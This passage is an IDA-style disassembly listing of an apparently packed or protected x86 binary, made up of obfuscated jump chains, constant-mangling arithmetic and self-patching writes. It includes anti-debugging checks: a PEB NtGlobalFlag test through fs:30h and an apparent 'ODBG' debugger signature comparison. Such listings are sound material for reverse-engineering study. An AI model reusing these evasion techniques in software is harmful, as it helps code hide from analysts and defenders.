loc_4534AB:				; CODE XREF: sub_43F34C:loc_43C1B4j
		push	6C278821h
		pop	eax
		or	eax, 0A3B7F9E1h
		jmp	loc_443ED7
; END OF FUNCTION CHUNK	FOR sub_43F34C
; ---------------------------------------------------------------------------

loc_4534BC:				; CODE XREF: k2vbe3.d:0045A2A0j
		jo	loc_459FAC

; =============== S U B	R O U T	I N E =======================================



sub_4534C2	proc near		; CODE XREF: sub_43DDA1+Ep

; FUNCTION CHUNK AT 004442D6 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00444762 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445FF5 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00449793 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0044EA51 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004509BC SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00453684 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045965B SIZE 00000022 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		mov	byte ptr [ebp+eax-100h], 0
		push	2010h
		push	edx
		jmp	loc_44EA51
sub_4534C2	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_220. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E69

loc_4534DA:				; CODE XREF: sub_454E69-2F12j
		jmp	loc_45BBB7
; END OF FUNCTION CHUNK	FOR sub_454E69
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C745

loc_4534DF:				; CODE XREF: sub_43C745+9j
		mov	[ebp-0Ch], eax
		mov	eax, [ebp-0Ch]
		cmp	eax, [ebp-14h]
		jb	loc_43FAEF
		mov	eax, [ebp-10h]
		mov	eax, [eax+64h]
		jmp	loc_452345
; END OF FUNCTION CHUNK	FOR sub_43C745
; ---------------------------------------------------------------------------

loc_4534F9:				; CODE XREF: k2vbe3.d:0043F1C5j
		jo	loc_4547CF
		cdq

loc_453500:				; CODE XREF: k2vbe3.d:loc_43F1B4j
		rol	eax, 1

loc_453502:				; CODE XREF: k2vbe3.d:004569CDj
		xor	eax, 80E12FB6h
		call	sub_4553CC
		mov	ds:dword_41E068, eax
		lea	eax, nullsub_473
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_473

; =============== S U B	R O U T	I N E =======================================



sub_453521	proc near		; CODE XREF: k2vbe3.d:0044AFFEj
					; sub_440EE3:loc_452A3Ep

arg_0		= dword	ptr  4

		xchg	edx, [esp+0]
		pop	edx
		add	ebx, 505FAFBh
		xchg	ebx, [esp-4+arg_0]
		jmp	sub_44367E
sub_453521	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_453533	proc near		; DATA XREF: sub_45A323:loc_43DC12o
		xchg	esi, [esp+0]
		push	esi
		pop	ecx
		pop	esi
		jmp	loc_43C935
sub_453533	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_45353E:				; CODE XREF: k2vbe3.d:loc_458420j
		jz	loc_44F2F8
		jmp	loc_441067
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43FDC1

loc_453549:				; CODE XREF: sub_43FDC1+69DBj
		pop	ecx
		add	ecx, 38784439h
		sub	ecx, 0F356D212h
		add	ecx, 99ECE297h
		xchg	ecx, [esp+8+var_8]
		jmp	sub_453347
; END OF FUNCTION CHUNK	FOR sub_43FDC1
; ---------------------------------------------------------------------------
		mov	ds:off_41E114, eax
		lea	eax, sub_44CB04
		mov	byte ptr [eax],	0C3h

loc_453573:				; CODE XREF: k2vbe3.d:0044501Aj
		jmp	sub_44CB04
; ---------------------------------------------------------------------------

loc_453578:				; CODE XREF: k2vbe3.d:loc_454C3Bj
		xchg	eax, [esp]
		push	eax
		pop	edx
		pop	eax
		jmp	loc_4468A0
; ---------------------------------------------------------------------------
		mov	eax, 510AEA73h

loc_453588:				; CODE XREF: k2vbe3.d:0045BD7Cj
		call	sub_4553CC
		push	ecx
		push	0E6D34205h
		adc	ecx, 0C17EFAEBh
		jmp	loc_45AA47
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C927

loc_45359E:				; CODE XREF: sub_43C927+19A60j
		jz	loc_443301
		jmp	loc_45367F
; END OF FUNCTION CHUNK	FOR sub_43C927
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44921C

loc_4535A9:				; CODE XREF: sub_44921C-C660j
		jnz	loc_44CD9D
		jmp	loc_4551F1
; END OF FUNCTION CHUNK	FOR sub_44921C
; ---------------------------------------------------------------------------
		xor	esi, ebx
		cdq
		jmp	sub_44D391

; =============== S U B	R O U T	I N E =======================================



sub_4535BC	proc near		; CODE XREF: k2vbe3.d:0044AF7Cj
					; sub_450359+14p
		xchg	edi, [esp+0]
		pop	edi
		push	ebp
		mov	eax, [ebp-20h]
		call	sub_44071B
		push	offset sub_45A4D8
		jmp	nullsub_140
sub_4535BC	endp

; ---------------------------------------------------------------------------

loc_4535D3:				; CODE XREF: k2vbe3.d:0044A158j
		jnp	loc_44B2BE
		xchg	ecx, edx
		rol	ebp, 9
; START	OF FUNCTION CHUNK FOR sub_43EFC9

loc_4535DE:				; CODE XREF: sub_43EFC9+B164j
		add	edx, 0BFF9D185h
		mov	[edx], eax
		pop	edx
		jmp	loc_43FD32
; END OF FUNCTION CHUNK	FOR sub_43EFC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45482D

loc_4535EC:				; CODE XREF: sub_45482D:loc_4480F2j
					; k2vbe3.d:00448104j
		xor	esi, 6198A600h
		popf
		add	eax, esi
		pop	esi
		pushf
		push	esi
		push	52F559C6h
		jmp	loc_45A1C1
; END OF FUNCTION CHUNK	FOR sub_45482D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443A30

loc_453602:				; CODE XREF: sub_443A30:loc_44A659j
		jnz	loc_43E98C
		jmp	loc_459D64
; END OF FUNCTION CHUNK	FOR sub_443A30
; ---------------------------------------------------------------------------
		add	eax, 4F6FDD8Ch
		cmp	edx, ecx
		jmp	loc_455129
; ---------------------------------------------------------------------------
		push	edi
		push	0FE2D4845h
		pop	edi
		rol	edi, 1
		add	edi, 3E75051h
		mov	[edi], eax
		pop	edi
		lea	eax, nullsub_9
		jmp	loc_455BFA
; ---------------------------------------------------------------------------
		mov	ebx, [ebp+0]
		mov	edi, edx
		jmp	loc_45A3CE
; ---------------------------------------------------------------------------

loc_453641:				; DATA XREF: k2vbe3.d:loc_44A046o
		push	ecx
		push	edx
		mov	edx, ebx
		xchg	edx, [esp]
; START	OF FUNCTION CHUNK FOR sub_44ED3C

loc_453648:				; CODE XREF: sub_44ED3C:loc_451FBFj
		push	edx
		push	eax
		rol	ecx, 4
		shr	edx, 1
		jmp	loc_45C1A5
; END OF FUNCTION CHUNK	FOR sub_44ED3C
; ---------------------------------------------------------------------------

loc_453654:				; CODE XREF: k2vbe3.d:004577DFj
		add	esi, 0AB878E63h
		mov	[esi], eax
		pop	esi
		mov	eax, [ebp-4]
		mov	al, [eax]
		jmp	loc_44FF88
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44128B

loc_453667:				; CODE XREF: sub_44128B:loc_4523F1j
					; k2vbe3.d:00452400j
		add	eax, 0FE722919h
		rol	eax, 17h
		xor	eax, 41A1C8FDh
		add	edx, eax
		pop	eax
		pushf
; END OF FUNCTION CHUNK	FOR sub_44128B
; START	OF FUNCTION CHUNK FOR sub_4468FE

loc_45367A:				; CODE XREF: sub_4468FE:loc_4477E9j
		call	sub_445593

loc_45367F:				; CODE XREF: sub_43C927+16C7Dj
		jmp	loc_451D3A
; END OF FUNCTION CHUNK	FOR sub_4468FE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4534C2

loc_453684:				; CODE XREF: sub_4534C2-ED5Bj
		jmp	nullsub_141
; END OF FUNCTION CHUNK	FOR sub_4534C2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450F71

loc_453689:				; CODE XREF: sub_450F71:loc_43DFD6j
					; sub_450F71+506j
		movzx	eax, word ptr [ebp-6]
		push	0AB2FE6A5h
		pop	edx
		rol	edx, 1
		jb	loc_44666C

loc_45369B:				; CODE XREF: k2vbe3.d:00443A16j
		jmp	loc_441E5C
; END OF FUNCTION CHUNK	FOR sub_450F71
; ---------------------------------------------------------------------------
		or	edx, 3FCBED2h
		jmp	loc_43EB56
; ---------------------------------------------------------------------------
		push	eax
		ror	eax, 1Bh
		mov	ds:dword_43FA64, eax
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BAE4

loc_4536B6:				; CODE XREF: sub_44BAE4+F8D6j
		jmp	sub_43C206
; END OF FUNCTION CHUNK	FOR sub_44BAE4
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444297

loc_4536BB:				; CODE XREF: sub_444297-4D55j
		jmp	loc_444816
; END OF FUNCTION CHUNK	FOR sub_444297
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441172

loc_4536C0:				; CODE XREF: sub_441172+Cj
					; sub_44B208+3DABj
		rol	eax, 1Bh
		jmp	loc_43CF79
; END OF FUNCTION CHUNK	FOR sub_441172
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C990

loc_4536C8:				; CODE XREF: sub_44C990j
		mov	eax, [esp+0]
		push	offset loc_458A25
		jmp	loc_44CADF
; END OF FUNCTION CHUNK	FOR sub_44C990
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440CEA

loc_4536D5:				; CODE XREF: sub_440CEA+1AE22j
		test	eax, edx
		jmp	loc_457AF0
; END OF FUNCTION CHUNK	FOR sub_440CEA

; =============== S U B	R O U T	I N E =======================================



sub_4536DC	proc near		; CODE XREF: sub_447692:loc_44B4BFj
					; k2vbe3.d:0045898Cj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043C01E SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0043EE59 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044A226 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00450D38 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 00453257 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453E2E SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00454CDA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00456A25 SIZE 0000000B BYTES

		push	ebp
		jg	loc_43EE59
		sub	ebp, 49B4A118h
		jmp	loc_43C01E
sub_4536DC	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_4536EE:				; DATA XREF: sub_44A7C2+2878o
		add	eax, edi
		pop	edi
		push	offset loc_44877E
		jmp	locret_449994
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D786

loc_4536FB:				; CODE XREF: sub_43D786:loc_45336Fj
		add	ebx, 9FE7F301h
		push	offset loc_44FCE5
		jmp	loc_459F15
; END OF FUNCTION CHUNK	FOR sub_43D786

; =============== S U B	R O U T	I N E =======================================



sub_45370B	proc near		; DATA XREF: k2vbe3.d:00444466o
		lea	eax, loc_4473A0
		push	eax
		push	eax
		mov	edx, eax
		jmp	loc_45A360
sub_45370B	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_145. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
		mov	ds:dword_41E15C, eax
		lea	eax, nullsub_225
		mov	byte ptr [eax],	0C3h
		jmp	nullsub_225
; ---------------------------------------------------------------------------

loc_45372F:				; CODE XREF: k2vbe3.d:00456FBAj
		mov	eax, [esp]
		push	edx
		call	sub_44F49C
		mov	eax, 5389CFC1h
		call	sub_4553CC
		jmp	loc_450712
; ---------------------------------------------------------------------------
		add	edi, 2D4683CBh
		jmp	loc_454224
; ---------------------------------------------------------------------------

loc_453752:				; CODE XREF: k2vbe3.d:loc_447FCBj
		test	esi, 20000h
		jmp	loc_44F350
; ---------------------------------------------------------------------------

loc_45375D:				; DATA XREF: sub_4538AB:loc_4538B5o
		push	eax
		push	5B819083h
		pop	eax
		xor	eax, 1048FCC5h
		sub	eax, 13D47850h
		rol	eax, 1Eh
		or	eax, ds:4000ECh
		add	eax, 7047DE51h
		jmp	loc_447672
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B20A

loc_453784:				; CODE XREF: sub_45B20A-11FB5j
		jge	loc_457724
		cmp	edx, eax
		jmp	loc_44E2CC
; END OF FUNCTION CHUNK	FOR sub_45B20A
; ---------------------------------------------------------------------------
		mov	ds:dword_41E144, eax
		push	offset sub_444AB3
		jmp	locret_451265
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C3A9

loc_4537A1:				; CODE XREF: sub_43C3A9:loc_44F890j
		sub	eax, 0C0AA7EBCh
		xor	eax, 4AD5C100h
		call	sub_44ADEC
		jmp	loc_45732B
; END OF FUNCTION CHUNK	FOR sub_43C3A9
; ---------------------------------------------------------------------------

loc_4537B7:				; CODE XREF: k2vbe3.d:0043F1E4j
		jnb	loc_447208
		jmp	loc_441992
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_4537C2:				; CODE XREF: sub_4553CC:loc_44F3FDj
		or	ecx, edi
		jmp	loc_44DE4F
; END OF FUNCTION CHUNK	FOR sub_4553CC

; =============== S U B	R O U T	I N E =======================================



sub_4537C9	proc near		; CODE XREF: sub_4599AA:loc_44FEFCp
					; k2vbe3.d:00450EFFj

; FUNCTION CHUNK AT 00440882 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00450A20 SIZE 00000005 BYTES

		xchg	edx, [esp+0]
		pop	edx
		push	eax
		mov	eax, ecx
		xchg	eax, [esp+0]
		mov	[ebp-4], eax
		jmp	loc_450A20
sub_4537C9	endp


; =============== S U B	R O U T	I N E =======================================



sub_4537DB	proc near		; CODE XREF: sub_45A323+69j
					; DATA XREF: k2vbe3.d:00458482o

; FUNCTION CHUNK AT 00445631 SIZE 00000005 BYTES

		pop	ebx
		lea	eax, sub_441409
		mov	byte ptr [eax],	0C3h
		jmp	loc_445631
sub_4537DB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441409

loc_4537EA:				; CODE XREF: sub_441409+1j
		mov	eax, [esp-4+arg_0]
		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+0]
		call	sub_44FF20

loc_4537F8:				; CODE XREF: sub_45971A-B696j
		jmp	loc_4546E1
; END OF FUNCTION CHUNK	FOR sub_441409
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C94

loc_4537FD:				; CODE XREF: sub_440C94+8187j
		jmp	loc_440DA4
; END OF FUNCTION CHUNK	FOR sub_440C94
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44471B

loc_453802:				; CODE XREF: sub_44471B+8A35j
		shl	esi, 13h
		mov	eax, 7ADF19Fh

loc_45380A:				; CODE XREF: sub_44471B:loc_441621j
		or	edi, 0CCD5C2FAh
		test	edi, 100h
		jmp	loc_44D0A4
; END OF FUNCTION CHUNK	FOR sub_44471B

; =============== S U B	R O U T	I N E =======================================



sub_45381B	proc near		; CODE XREF: sub_450EE5j
					; DATA XREF: sub_450EDBo
		push	ebp
		call	sub_43CCB3

loc_453821:				; CODE XREF: sub_4412A1+11AB5j
		jmp	sub_450740
sub_45381B	endp

; ---------------------------------------------------------------------------

loc_453826:				; CODE XREF: k2vbe3.d:00449036j
		jmp	loc_441670
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75C

loc_45382B:				; CODE XREF: sub_43F75C+921Ej
		jmp	nullsub_143
; END OF FUNCTION CHUNK	FOR sub_43F75C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448D7F

loc_453830:				; CODE XREF: sub_448D7F-A2F5j
		jmp	loc_4587B2
; END OF FUNCTION CHUNK	FOR sub_448D7F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_453835:				; CODE XREF: sub_45A323-745Cj
		add	eax, 1C00641Eh
		add	eax, ebp
		add	eax, 149BA807h
		cmp	dword ptr [eax], 4742444Fh
		jz	loc_44DE55
		jmp	loc_456121
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------

loc_453854:				; DATA XREF: sub_447692:loc_45A527o
		sbb	ebx, ecx
		rol	edx, 10h
		or	edx, ebx
		xchg	eax, [esp]
		jmp	loc_458CF2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4479A1

loc_453863:				; CODE XREF: sub_4479A1:loc_447156j
		add	eax, 72A30336h
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp+0]
		push	edx
		push	0E99157CBh
		pop	edx
		jmp	loc_4451B5
; END OF FUNCTION CHUNK	FOR sub_4479A1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44E481

loc_45387B:				; CODE XREF: sub_44E481+851Fj
		cdq
		xchg	edi, [ecx]
		sbb	eax, edx
		sbb	eax, 7C6A31EAh
		jmp	loc_45A71B
; END OF FUNCTION CHUNK	FOR sub_44E481
; ---------------------------------------------------------------------------

loc_45388B:				; CODE XREF: k2vbe3.d:0045433Bj
		jle	loc_459389
		xchg	ebp, ebx
; START	OF FUNCTION CHUNK FOR sub_44C564

loc_453893:				; CODE XREF: sub_44C564:loc_454325j
		add	ebx, 5F81BD5h

loc_453899:				; DATA XREF: k2vbe3.d:00449B75o
		xchg	ebx, [esp-0Ch+arg_8]
		jmp	loc_457EE6
; END OF FUNCTION CHUNK	FOR sub_44C564
; ---------------------------------------------------------------------------

loc_4538A1:				; DATA XREF: sub_448D9B+7o
		jmp	loc_4046E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F42B

loc_4538A6:				; CODE XREF: sub_44F42B+Cj
		jmp	loc_4575CE
; END OF FUNCTION CHUNK	FOR sub_44F42B

; =============== S U B	R O U T	I N E =======================================



sub_4538AB	proc near		; CODE XREF: sub_453FD5j
					; DATA XREF: sub_441FEB:loc_453FCBo

; FUNCTION CHUNK AT 0043FFBC SIZE 00000005 BYTES

		call	sub_4599AA
		mov	eax, 0BEB860A6h

loc_4538B5:				; CODE XREF: sub_44F1A6:loc_446E10j
		push	offset loc_45375D
		jmp	loc_43FFBC
sub_4538AB	endp

; ---------------------------------------------------------------------------

loc_4538BF:				; CODE XREF: k2vbe3.d:0043D33Aj
		or	edx, 32334AC2h
		ja	loc_4544F1

loc_4538CB:				; CODE XREF: k2vbe3.d:loc_44F2B5j
		push	edi
		push	0DD63C50Bh
		pop	edi
		xor	edi, 8A204479h
		add	edi, 0A9015AF8h
		jmp	loc_456D4C
; ---------------------------------------------------------------------------

loc_4538E3:				; DATA XREF: k2vbe3.d:0044C444o
		popf

loc_4538E4:				; CODE XREF: k2vbe3.d:00450CD4j
					; k2vbe3.d:loc_453396j
		push	ebp
		mov	ebp, eax
		xchg	ebp, [esp]
		call	sub_445243
		push	edi
		push	64BA4394h
		pop	edi
		jmp	loc_44B044
; ---------------------------------------------------------------------------

loc_4538FB:				; DATA XREF: sub_4541D3-CB1Co
		call	sub_4512B9
; START	OF FUNCTION CHUNK FOR sub_454F9F

loc_453900:				; CODE XREF: sub_445124:loc_43EB1Dj
					; sub_43FEF8:loc_44157Dj ...
		mov	esp, ebp
		xchg	ecx, [esp+0]
		mov	ebp, ecx
		pop	ecx
		jmp	loc_4413AB
; END OF FUNCTION CHUNK	FOR sub_454F9F
; ---------------------------------------------------------------------------

loc_45390D:				; CODE XREF: k2vbe3.d:loc_441A39j
		add	eax, 7DA75300h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_442125
		jmp	loc_458420
; ---------------------------------------------------------------------------
		add	ebx, 0B5EA7C97h
		jmp	loc_44053D
; ---------------------------------------------------------------------------
		jnz	loc_449CC5
		mov	[esi], edx
		jmp	sub_45299C
; ---------------------------------------------------------------------------
		cmp	edx, 43B66F45h
		jmp	loc_451DD1
; ---------------------------------------------------------------------------
		mov	ds:dword_441774, eax
		call	sub_4414DA
		push	offset loc_450E78
		jmp	loc_451878
; ---------------------------------------------------------------------------
		mov	ecx, 70570A1Fh
		jmp	sub_43DDA1
; ---------------------------------------------------------------------------

locret_453963:				; CODE XREF: k2vbe3.d:0043DC65j
		retn
; ---------------------------------------------------------------------------
		adc	ecx, 0E311CC01h
		jmp	loc_45ADE7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443EF6

loc_45396F:				; CODE XREF: sub_443EF6:loc_454A1Aj
		mov	eax, 0B4B93D2h
		push	ebx
		push	0EBEE482h
		pop	ebx
		sub	ebx, 0B4C67073h
		or	ebx, 3F366D1Ch
		jmp	loc_43E9DF
; END OF FUNCTION CHUNK	FOR sub_443EF6
; ---------------------------------------------------------------------------

loc_45398C:				; CODE XREF: k2vbe3.d:loc_445042j
		pop	esi
		rol	esi, 1Fh
		or	esi, 0BEE4D7E7h
		sub	esi, 0BBA5DA0h
		jmp	loc_43DAB3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4544C3

loc_4539A1:				; CODE XREF: sub_4544C3+9j
		mov	eax, ecx
		xchg	eax, [esp+4+var_4]
		mov	esp, ebp
		pop	ebp
		push	62BA46DAh
		jmp	loc_45237C
; END OF FUNCTION CHUNK	FOR sub_4544C3

; =============== S U B	R O U T	I N E =======================================



sub_4539B3	proc near		; DATA XREF: k2vbe3.d:00447891o

; FUNCTION CHUNK AT 0044AB73 SIZE 0000000B BYTES

		mov	eax, large fs:30h
		add	eax, 6936F508h
		add	eax, 96C90B60h
		mov	eax, [eax]
		test	eax, 70h
		jmp	loc_44AB73
sub_4539B3	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_459216

loc_4539D2:				; CODE XREF: sub_459216:loc_4502B0j
		mov	[ebp-4], eax
		jmp	loc_441E80
; END OF FUNCTION CHUNK	FOR sub_459216
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446CCF

loc_4539DA:				; CODE XREF: sub_446CCF:loc_455692j
		lea	eax, [ebp-125h]
		push	eax
		call	sub_4508A3
		mov	[ebp-4], eax
		jmp	loc_4563CC
; END OF FUNCTION CHUNK	FOR sub_446CCF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_4539EE:				; CODE XREF: sub_44C90E+A2A6j
		and	ebx, 0F16132B8h

loc_4539F4:				; CODE XREF: sub_44C90E:loc_454366j
		push	edi

loc_4539F5:				; CODE XREF: k2vbe3.d:loc_450593j
		push	0C2B810h
		pop	edi
		jmp	loc_455A9A
; END OF FUNCTION CHUNK	FOR sub_44C90E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_453A00:				; CODE XREF: sub_44D59D:loc_4548D0j
		jz	sub_452092
		jmp	loc_4448D3
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------

loc_453A0B:				; CODE XREF: k2vbe3.d:004460C8j
		push	0BF9597CCh
		pop	ecx
		xor	ecx, 0DB8960ACh
		or	ecx, 124037E7h
		add	ecx, 89E74592h
		xchg	ecx, [esp]
		jmp	sub_43C04E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4467A1

loc_453A2B:				; CODE XREF: sub_4467A1:loc_450183j
		rol	eax, 1Bh
		xor	eax, 6E559581h
		add	eax, ebp
		add	eax, 5BFB3B2Ch
		mov	eax, [eax]
		popf
		push	eax
		jmp	loc_452647
; END OF FUNCTION CHUNK	FOR sub_4467A1
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_452. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452D37

loc_453A46:				; CODE XREF: sub_452D37:loc_444316j
		add	eax, ebp
		add	eax, 5F096858h
		mov	eax, [eax]
		push	edi
		mov	edi, eax
		xchg	edi, [esp+8+var_8]
		push	offset loc_44D002
		jmp	nullsub_169
; END OF FUNCTION CHUNK	FOR sub_452D37
; ---------------------------------------------------------------------------

loc_453A60:				; DATA XREF: sub_4465B1+8o
		mov	esp, ebp
		pop	ebp
		push	128FEF22h
		pop	eax
		sub	eax, 9B91A547h
		or	eax, 0D33D7D8h
		sub	eax, 0FD6258AFh
		jmp	loc_441A39
; ---------------------------------------------------------------------------

loc_453A80:				; CODE XREF: k2vbe3.d:00443D17j
		sub	edi, 0AB393A47h
		add	edi, 6696D5BBh
		jnz	loc_459428
; START	OF FUNCTION CHUNK FOR sub_44D345

loc_453A92:				; CODE XREF: sub_44D345+CEB7j
		jmp	nullsub_365
; END OF FUNCTION CHUNK	FOR sub_44D345
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D0D5

loc_453A97:				; CODE XREF: sub_44D0D5-9A8Bj
		jmp	loc_448D20
; END OF FUNCTION CHUNK	FOR sub_44D0D5
; ---------------------------------------------------------------------------

loc_453A9C:				; CODE XREF: k2vbe3.d:0044FCEFj
		adc	ebp, 8914CA37h
		sbb	edx, 800DBFC5h
		test	ebx, edi
		jmp	loc_459422
; ---------------------------------------------------------------------------

loc_453AAF:				; CODE XREF: k2vbe3.d:0044EE5Cj
		jnb	loc_443252
		and	esi, ebp
		cmp	ebx, 0A7565AC5h
		jmp	loc_43F519
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4553CC

loc_453AC2:				; CODE XREF: sub_4553CC-4C3Fj
		jp	loc_440B62

loc_453AC8:				; CODE XREF: sub_4553CC:loc_450786j
		sub	edx, 76972F44h
		add	edx, 98E3FBFDh
		mov	edx, [edx]
		or	edx, edx
		jmp	loc_44275A
; END OF FUNCTION CHUNK	FOR sub_4553CC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4437D3

loc_453ADD:				; CODE XREF: sub_4437D3+8j
		jz	loc_459B42
		jmp	loc_44AE81
; END OF FUNCTION CHUNK	FOR sub_4437D3

; =============== S U B	R O U T	I N E =======================================



sub_453AE8	proc near		; DATA XREF: sub_44A1B1:loc_456E2Fo

var_4		= dword	ptr -4
arg_8		= dword	ptr  0Ch

; FUNCTION CHUNK AT 0043C72D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00441F8B SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044AC13 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044BF75 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044DD44 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E4AC SIZE 00000016 BYTES
; FUNCTION CHUNK AT 0044E5BB SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045534E SIZE 00000009 BYTES
; FUNCTION CHUNK AT 0045700D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458EFC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045B5C3 SIZE 00000023 BYTES

		push	eax
		call	sub_43C418

loc_453AEE:				; CODE XREF: sub_43D488+12j
		jmp	loc_44E5BB
sub_453AE8	endp ; sp-analysis failed

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_96. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44FF97

loc_453AF4:				; CODE XREF: sub_44FF97+1278j
		jmp	loc_441F80
; END OF FUNCTION CHUNK	FOR sub_44FF97
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_349. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44DC2C

loc_453AFA:				; CODE XREF: sub_44DC2C+Bj
		jmp	nullsub_351
; END OF FUNCTION CHUNK	FOR sub_44DC2C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C305

loc_453AFF:				; CODE XREF: sub_44C305+6j
		jmp	nullsub_472
; END OF FUNCTION CHUNK	FOR sub_44C305
; ---------------------------------------------------------------------------
		push	edx
		push	3DAFD635h
		pop	edx
		rol	edx, 1Fh
		jmp	loc_4506EA
; ---------------------------------------------------------------------------

loc_453B13:				; CODE XREF: k2vbe3.d:0045C1BEj
		jle	loc_452EF8
		add	edi, ebp
		adc	ebp, 325D0CE3h

loc_453B21:				; CODE XREF: k2vbe3.d:loc_45C1AFj
		rol	eax, 6
		jmp	loc_444CA7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44D59D

loc_453B29:				; CODE XREF: sub_44D59D:loc_442CA2j
		jnz	loc_45285B
		jmp	loc_4530A2
; END OF FUNCTION CHUNK	FOR sub_44D59D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458DAF

loc_453B34:				; CODE XREF: sub_45BD38+11j
		or	eax, 0FCA25554h
		rol	eax, 9
		or	eax, 149D2D40h
		add	eax, 0AA84AE38h
		jmp	loc_44B1CE
; END OF FUNCTION CHUNK	FOR sub_458DAF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44C90E

loc_453B4E:				; CODE XREF: sub_44C90E-F0F6j
		jge	loc_446A55
; END OF FUNCTION CHUNK	FOR sub_44C90E
; START	OF FUNCTION CHUNK FOR sub_45A323

loc_453B54:				; CODE XREF: sub_45A323-C7Fj
		jmp	loc_4522C9
; END OF FUNCTION CHUNK	FOR sub_45A323
; ---------------------------------------------------------------------------
		shl	ecx, 8
